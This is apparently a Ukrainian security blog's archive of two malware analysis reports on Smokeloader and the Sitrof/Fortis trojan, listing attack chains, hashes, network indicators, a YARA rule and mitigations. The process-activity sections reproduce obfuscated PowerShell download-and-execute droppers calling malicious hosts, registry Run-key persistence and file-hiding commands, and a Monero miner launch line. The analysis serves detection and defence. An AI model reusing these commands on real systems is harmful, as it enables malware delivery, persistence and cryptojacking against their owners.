Tag Archive | smokeldr

IOC_sitrof_smokeldr_230218

Доброго вечора, панове.

До вашої уваги підсумки по сьогоднішнім зразкам.

Отже на аналіз було передано: уже знайомий нам #smokeloader та троян #sitrof (fortis).

Рівень загрози по обом – середній. Для тих, хто уважно читає наші поради – низький в обох випадках.

 

Трохи аналітики:

#smokeloader

 

  • Враховуючи почерк цієї команди слід очікувати нових зразків із цим посиланням
  • Схема не змінилася – обфусковані JS скрипти в архіві
  • Скрипт чітко вказує адресу та ім’я, під яким payload записується на диск
  • Завантаження основної частини засобами Powershell
  • Не потребує прав Адміністратора
  • Цього разу змінили домен та застосували обфускацію команд при передачі

#sitrof

  • Цей штам дуже мало застосовувався
  • Повторний запуск = новий клон (розмір*2, інше ім’я, мімікрія під системні файли) – цей модуль взяли у #zbot
  • Чітка атрибутика (завдяки Techhelplist) по User Agent (POST /ftsri.php?reg)
  • Не потребує прав Адміністратора
  • Пристосований до збору інформації
  • Говорити про нього як про інструмент складної атаки не варто, це швидше розвідка за допомогою нетипового семплу
  • Проте він досить “незграбний” і створює багато артефактів, тому схиляюсь до думки що це потяг до екзотики, а не прояв майстерності
  • Вносить зміни в реєстр щоб приховати своє тіло (старий трюк)

 

Схема атаки:

 

#smokeloader

 

email > Attach (RAR) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL >

'h11p:\ vivedoc{.} ru/document/pax.exe' >  $env:temp + '\1004.exe

* (минулого разу – enterwords{.} ru/uadoc/crsse.exe > 11054.exe, до того - 63753.exe, а ще раніше 5541.exe)

 

#sitrof

Вектор доставки не підтверджено.

 

Маркери IOC:

 

#smokeloader

Приєднання (архів):

SHA-256            843f898ca145f00e643019c64376491882431fbbc4f187cd6e011050375c6829
File name            рахунок фактура 21.02.2018р.rar
File size              85.71 KB

 

скрипт приманка:

SHA-256            3010c97b0589cc954574e209f93cf4499e64cf812fb12b37e1aec7b0e4ffbedd
File name           рах.фак. 75-КТ.xls.js
File size              33.47 KB

основна частина:

SHA-256            e67bc39af0cd4e5bf5d346927c06c2af2d9209d794ad98c9387d797b914f3423
File name           pax.exe >> $env:temp + '\1004.exe
File size              345 KB

 

#sitrof

основна частина:

SHA-256            59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c
File name           System Volume Information.exe
File size              41.56 KB

Наступні ітерації запуску:

>2га
SHA-256    21a25b82388ff6794dcfecf238d035c6f71cfd7a453f1123c4f3bd01b0425df6
File name   mstray.exe
File size    83.13 KB

>3тя
SHA-256        af4d350c56c49fe3353d3ccb9fd10507e8ac35ccced7a90abd66d12b06447275
File name   ftshost.exe
File size    166.26 KB

>4та
SHA-256        86dd5923f69f8530c7cb7107dcca0b5518fcf7cb249da19551a2f963d40e63be
File name   mshost.exe
File size    332.52 KB

>5та
SHA-256    5b2740e47f7dace861e9e6619936fbaeb93a3834ee19f7bfc4f979cdb12cdf69
File name   mssvc.exe
File size    665.04 KB

 

Мережеві IOC:

 

#smokeloader

 

завантаження payload – досі активна!

104.18.59.143    vivedoc{.} ru      GET /document/pax.exe HTTP/1.1
(минулого разу -  92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

 

трафік скомпрометованої системи – сервер контролю (так само як і минулого разу)

92.63.197.13      honeyindoc{.} ru POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

#sitrof

c2 :

yourssagregator{.} comlu{.} com/ftsri.php
allnewsmedia{.} webatu{.} com/ftsri.php

 

Передача зібраної інформації (система, користувач, CPU)

153.92.0.100      HTTP 346   lovecatalog{.} comlu{.} com POST /ftsri.php?reg&ver=4.100000&comp=agent&addinfo=test@agent;%202%20x86%20"Intel"%20processor(s) HTTP/1.1
153.92.0.100      HTTP 215   yourssagregator{.} comlu{.} com  POST /ftsri.php?get&version HTTP/1.1
153.92.0.100      HTTP 244   yourssagregator{.} comlu{.} com  GET /ftsri.php?get&module=\023=K6\263\023;W\03#JEB HTTP/1.1

 

Трафік скомпрометованої системи

mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                     
mshost.exe1600               TCP        153.92.0.100       80           CLOSE_WAIT                                                                                                                                     
mshost.exe1600               TCP        104.20.67.46       443         CLOSE_WAIT

 

Активність по процесам:

 

#smokeloader

 

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Ліричний відступ, нагадую, що ENS обладнано сигнатруами для блокування певних команд Powershell

Їх просто потрібно активувати:

На відміну від минулого разу застосували ще сильнішу обфускацію команд

 

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рах.фак. 75-КТ.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a111=powe&& set _a222=rsh&& set _a333=ell&& call %_a111%%_a222%%_a333% $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

powershell  $CsbSHQUu = 'GyxDSwG';$a = 'Msxml' + '2.XML' + 'HTTP';$z5iLQa8 = 'pIPBA';$b = 'ADO' + 'DB.' + 'Stream';$kacCc = 'mEKyiYy1';$c = 'G' + 'E' + 'T';$JnheMsVo = 'SHblsw';$d = 1 - 1 + 1;$pDhstfie = 'zwqEzO';$hr = New-Object -ComObject $a;$ddbeu = 'KfHL80';$ab = New-Object -ComObject $b;$jUi2Pmko = 'GNbYLYU';$path = $env:temp + '\1004.exe';$Nn8NG = 'ISrrb';$hr.open($c, 'http://vivedoc{.} ru/document/pax.exe', 0);$FbWdaAPm = 'MuwGl';$hr.send();$tkzNp = 'aummFLV';$NWHLjOHp = 'TXzrW';$hryQYP = 'NipavHP';$otGXcz = 'YxEi0';$ab.open();$leJkI = 'b7CaDKAEf';$ab.type = $d;$XhzVqK = 'uG0QddHO';$ab.write($hr.responseBody);$RZAQmIf3 = 'xckwyBI';$ab.savetofile($path);$zGsspdDz = 'rZ4chUv';$ab.close();$zyOHSXL = 'PyCybbp';$cOo8LIl = 'C7ms3yUc';$Cexglw = 'YI128';$ankqLgZP = 'TKwSsN';$DgphQkeP = 'orASsm';$cwndO = 'cJPoPB';$bXBnK = 'HzkFOlL';Start-Process $path;

"C:\tmp\1004.exe"

 

Закріплення через HCU (так само як і минулого разу)

 

Policies                      c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe           
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf
HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

 

#sitrof

Після запуску дублює своє тіло у довільний підкаталог operator\AppData\Roaming\Microsoft\*\ (SDL, DLL, etc)

Свою копію додає до списку автозавантаження

Ліричний відступ, нагадую, що ENS обладнано вбудованим правило для блокування такої активності

Просто активуйте правило:

 

"C:\Users\operator\Desktop\System Volume Information.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f


"C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe"
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v mqkldrv /t REG_SZ /d "C:\Users\operator\AppData\Roaming\Microsoft\bin\mshost.exe" /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0x00000000 /f
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0x00000001 /f

 

Закріплення

mqkldrv                     c:\users\operator\appdata\roaming\microsoft\bin\mshost.exe        02.09.2007 13:34

McAfee

YARA (c) @ Techhelplistcom

 

rule sitrof_fortis {

meta:
author = ” J from THL <j@techhelplist.com>”
date = “2018/23”
reference = “https://www.virustotal.com/#/file/59ab6cb69712d82f3e13973ecc7e7d2060914cea6238d338203a69bac95fd96c/community&#8221;
version = 1
maltype = “Stealer”
filetype = “memory”

strings:

$a = “?get&version”
$b = “?reg&ver=”
$c = “?get&exe”
$d = “?get&download”
$e = “?get&module”
$f = “&ver=”
$g = “&comp=”
$h = “&addinfo=”
$i = “%s@%s; %s %s \”%s\” processor(s)”
$j = “User-Agent: fortis”

condition:
6 of them
}

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • (#sitrof) YARA правило для визначення активності – дякую Techhelplist
  • (#sitrof) Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • (#smokeloader) Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • (#smokeloader) Деактивація механізму Windows Script Host (варіант 2й)
  • (#smokeloader) Якщо ж Powershell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • (обидва зразки) Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • (#smokeloader) Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_150218

Доброго вечора, панове.

Сьогодні було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Схема та ж сама, що ми вже бачили 30го числа та 6го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу – сам завантажувач та майнер детектуються.

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці ZIP
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої та позаминулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Цього разу цикл роботи повний – smokeloader спричинив завантаження та запуск Monero Miner.

 Схема атаки:

email > Attach (ZIP) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL > GET > %temp%\11054.exe  (минулого разу - 63753.exe, позаминулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   Перечень.zip

SHA-256        ce848bb1cd63e5d12fe1a2da7b9f487282b061418dd5c8fcd6cf84b7456a3235

File size      21.72 KB

 

скрипт приманка:

File name   Описание продукции.js

SHA-256        4e54a1d40d583c655605a47ea36f69ea16bcc8df4e4d72370e3ebcfe71134a54

File size      18.88 KB

основна частина:

File name   crsse.exe >> 11054.exe >> rtdiubth.exe

SHA-256        5e8f227c91db834f536a016d014a277dd89f1e3b3e939761dc4847e260e9a89a

File size      300 KB

Monero miner:

File name   curl.exe

SHA-256    fc9a32ecce00b4b2d711fe9bda120c9f82f3c2405f3658d30f4dbdac5cedde26

File size      986.5 KB

Мережеві IOC:

 

завантаження payload – досі активна!

92.63.197.13      enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

(минулого разу - 104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1)

трафік скомпрометованої системи – сервер контролю

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

92.63.197.13      honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

(минулого разу - 104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

 

Завантаження та активація Monero Miner

92.63.197.13      HTTP 134   parodadoca[.]ru  GET /panel/mr/curl.exe HTTP/1.1

92.63.197.13      HTTP 457   parodadoca[.]ru  GET /panel/gate.php?machine_id=?&x64=False&version=1&video_card=?cpu=?&junk=15.02.2018%2017:08:03 HTTP/1.1

92.63.197.13      HTTP 108   parodadoca[.]ru  GET /panel/updmr.php HTTP/1.1

92.63.197.13      HTTP 108   parodadoca[.]ru  GET /panel/updbt.php HTTP/1.1

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell


"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Описание продукции.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\11054.exe';$http_request.open('GET', 'h11p:\enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\11054.exe';$http_request.open('GET', ' h11p:\enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\11054.exe"

C:\Windows\SysWOW64\explorer.exe

C:\tmp\4A0C.tmp.exe

Запуск та ініціалізація майнера:

"C:\Users\operator\AppData\Roaming\MicroMon\curl.exe" -o pool.minexmr[.]com:4444 -u 43Zg4SdBjs3gh6g -p x --cpu-affinity 75

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU (так само як і минулого разу)

 

Clients                       c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe             

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR